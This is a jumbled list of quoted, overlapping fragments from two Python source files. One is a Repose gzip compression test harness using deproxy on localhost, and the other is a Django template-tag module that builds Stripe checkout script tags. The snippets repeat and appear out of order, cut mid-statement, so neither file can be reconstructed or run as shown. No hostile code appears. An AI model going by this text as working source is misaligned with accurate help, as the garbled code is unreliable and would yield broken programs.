pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888", "run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser =", "self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if", "pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params is None: params", "deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir,", "= pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port =", "type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global", "= [] test_cases_set = set() for tc in args.test_case: if tc == 'all':", "= True if args.test_case is None: args.test_case = ['all'] test_cases = [] test_cases_set", "test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for", "config_verbose = False def apply_config_set(config_set_name, params=None): if params is None: params = {}", "apply_config_set(config_set_name, params=None): if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params)", "args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if", "dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print", "logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case", "import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose')", "in args.test_case: if tc == 'all': test_cases = available_test_cases break if tc not", "STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can be specififed \"", "test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if __name__ ==", "if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run():", "8888 stop_port = 7777 deproxy_port = 9999 headers = {} startup_wait_time = 15", "logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints()", "time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' %", "= argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test", "logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case", "url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1) mc =", "action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can be specififed \" \"multiple", "test case to run. Can be specififed \" \"multiple times. 'all' is the", "params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' %", "test_cases = available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule()", "self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not", "narwhal import pathutil import xmlrunner as _xmlrunner import logging import time import argparse", "params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir,", "def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy is not", "def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url)", "folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if", "setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = {", "parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which", "15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose", "if tc == 'all': test_cases = available_test_cases break if tc not in test_cases_set:", "'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve", "\"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG,", "test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if __name__ == '__main__': run()", "in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests", "'%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is None: args.test_case =", "None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ]", "conf from narwhal import pathutil import xmlrunner as _xmlrunner import logging import time", "False def apply_config_set(config_set_name, params=None): if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose,", "% url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1,", "runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args()", "tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader =", "logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200',", "import time import argparse import os import deproxy logger = logging.getLogger(__name__) config_dir =", "import pathutil import xmlrunner as _xmlrunner import logging import time import argparse import", "suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases:", "] def run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class", "headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is", "times. 'all' is the default, and runs all \" \"available test cases\", choices=['all']", "pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params is None:", "logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir =", "for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the", "+ test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):'", "xmlrunner as _xmlrunner import logging import time import argparse import os import deproxy", "None: args.test_case = ['all'] test_cases = [] test_cases_set = set() for tc in", "narwhal import repose import unittest from narwhal import conf from narwhal import pathutil", "if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader", "deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir,", "mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self):", "= 7777 deproxy_port = 9999 headers = {} startup_wait_time = 15 def setUpModule():", "up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None):", "python from narwhal import repose import unittest from narwhal import conf from narwhal", "artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self):", "TestCompression ] def run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] =", "destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost',", "'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port = 9999 headers = {}", "= self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port,", "7777 deproxy_port = 9999 headers = {} startup_wait_time = 15 def setUpModule(): #", "url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve", "parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to", "parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can be specififed \" \"multiple times.", "be specififed \" \"multiple times. 'all' is the default, and runs all \"", "'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url,", "argparse import os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir", "9999 headers = {} startup_wait_time = 15 def setUpModule(): # Set up folder", "params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def", "= set() for tc in args.test_case: if tc == 'all': test_cases = available_test_cases", "tc == 'all': test_cases = available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc)", "log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url", "tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append',", "tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy is not None:", "1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy", "test_cases = [] test_cases_set = set() for tc in args.test_case: if tc ==", "from narwhal import conf from narwhal import pathutil import xmlrunner as _xmlrunner import", "import argparse import os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose')", "'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port =", "self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir':", "loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner =", "class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir)", "= 8888 stop_port = 7777 deproxy_port = 9999 headers = {} startup_wait_time =", "= False def apply_config_set(config_set_name, params=None): if params is None: params = {} conf.process_config_set(config_set_name,", "verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point =", "def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params =", "logging import time import argparse import os import deproxy logger = logging.getLogger(__name__) config_dir", "the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can", "repose_port = 8888 stop_port = 7777 deproxy_port = 9999 headers = {} startup_wait_time", "tc in args.test_case: if tc == 'all': test_cases = available_test_cases break if tc", "in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if __name__ == '__main__':", "= 9999 headers = {} startup_wait_time = 15 def setUpModule(): # Set up", "apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/'", "= ['all'] test_cases = [] test_cases_set = set() for tc in args.test_case: if", "def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose =", "test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s'))", "= logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(),", "startup_wait_time = 15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir)", "pathutil import xmlrunner as _xmlrunner import logging import time import argparse import os", "logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters')", "import unittest from narwhal import conf from narwhal import pathutil import xmlrunner as", "stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s'", "test_cases_set = set() for tc in args.test_case: if tc == 'all': test_cases =", "headers = {} startup_wait_time = 15 def setUpModule(): # Set up folder hierarchy", "argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case", "[ TestCompression ] def run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__]", "if self.valve is not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases", "msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop()", "self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port':", "url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc)", "self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if", "True if args.test_case is None: args.test_case = ['all'] test_cases = [] test_cases_set =", "{ 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file", "'200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None:", "repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml',", "from narwhal import pathutil import xmlrunner as _xmlrunner import logging import time import", "\" \"multiple times. 'all' is the default, and runs all \" \"available test", "deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time)", "'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port", "log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port = 9999", "is the default, and runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(),", "if args.test_case is None: args.test_case = ['all'] test_cases = [] test_cases_set = set()", "help=\"Which test case to run. Can be specififed \" \"multiple times. 'all' is", "params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port))", "as _xmlrunner import logging import time import argparse import os import deproxy logger", "not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression", "case to run. Can be specififed \" \"multiple times. 'all' is the default,", "action='append', help=\"Which test case to run. Can be specififed \" \"multiple times. 'all'", "= %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc)", "is not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [" ]
[ "error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG))", "button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def", "script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector,", "return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector):", "element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script", "import mark_safe from django_stripe import settings from django_stripe.models import * OPEN_TAG = \"<script>\"", "$('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register", "from django import template from django.utils.safestring import mark_safe from django_stripe import settings from", "CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script =", ") element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html = \"\\n\".join((import_element, element)) return mark_safe(html)", "\"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script(", "settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE =", "return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script()", "element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script", "'{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element():", "var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}'", "\"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message);", "script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session,", "= _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element)", "{{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register =", "template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script =", "init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG,", "import settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE", "CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector,", "\"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\"", "template from django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models import *", "button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def", "(result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element =", "src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector,", "@register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element", "return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script()", "button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html = \"\\n\".join((import_element, element))", "script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script", "\"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE", "= '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def", "stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def", "element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script", "django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var", "_get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return", "checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html = \"\\n\".join((import_element,", "INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{", "error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script", "def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG,", "script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session,", "button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script,", "\"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element()", "script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element", "from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\"", "= _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script,", "button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session,", "_get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script,", "* OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe =", "mark_safe from django_stripe import settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG", "django import template from django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models", "error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html = \"\\n\".join((import_element, element)) return", "def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag()", "= \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\"", "= \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }});", "def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script =", "}}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element", "= _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector,", "_get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format(", "register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script():", "_get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag()", "return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG))", "script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return", "error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import():", "mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return", "{{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script", "= \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\"", "$('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>'", "= \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script =", "INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = 